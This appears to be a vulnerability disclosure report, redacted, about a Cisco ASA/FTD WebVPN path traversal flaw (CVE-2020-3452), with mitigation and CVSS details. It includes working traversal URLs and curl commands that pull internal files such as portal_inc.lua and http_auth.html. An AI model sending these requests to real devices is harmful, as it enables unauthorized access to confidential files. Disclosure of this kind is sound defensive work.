███ is vulnerable to CVE-2020-3452 Read-Only Path Traversal Vulnerability

**Summary:** ████████ is vulnerable to Read-Only Path Traversal Vulnerability as described at https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86 **Description:** Get request parameters at the /+CSCOT+/translation-table and the /+CSCOT+/oem-customization are not properly sanitized which allows for reading files within the webroot directory that are not intended to be readable. According to Cisco: The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. ## Step-by-step Reproduction Instructions ## In Browser: 1. Copy and paste into your browser: ███/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" 2. Note the file being requested to be download. This will be the source code for portal_inc.lua which is not normally accessible. ##In curl: 1. curl -k "████████/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" to prove you can read internal files such as the /+CSCOE+/portal_inc.lua file. 2. Various internal files can be read, and some require using the --output command to output the data to a file as shown in step 3. 3. curl -k "█████████/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/http_auth.html&default-language&lang=../" --output session.js ## Product, Version, and Configuration (If applicable) AnyConnect SSL VPN -webvpn Clientless SSL VPN - webvpn ## Suggested Mitigation/Remediation Actions Update the software to the latest version via the Cisco advisory linked above in the Summary. ## Impact An attacker can view arbitrary files within the web services file system on the targeted device that are meant to be internal or confidential. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. CVSS Score: Base 7.5 Vector: https://tools.cisco.com/security/center/cvssCalculator.x?version=3.1&vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N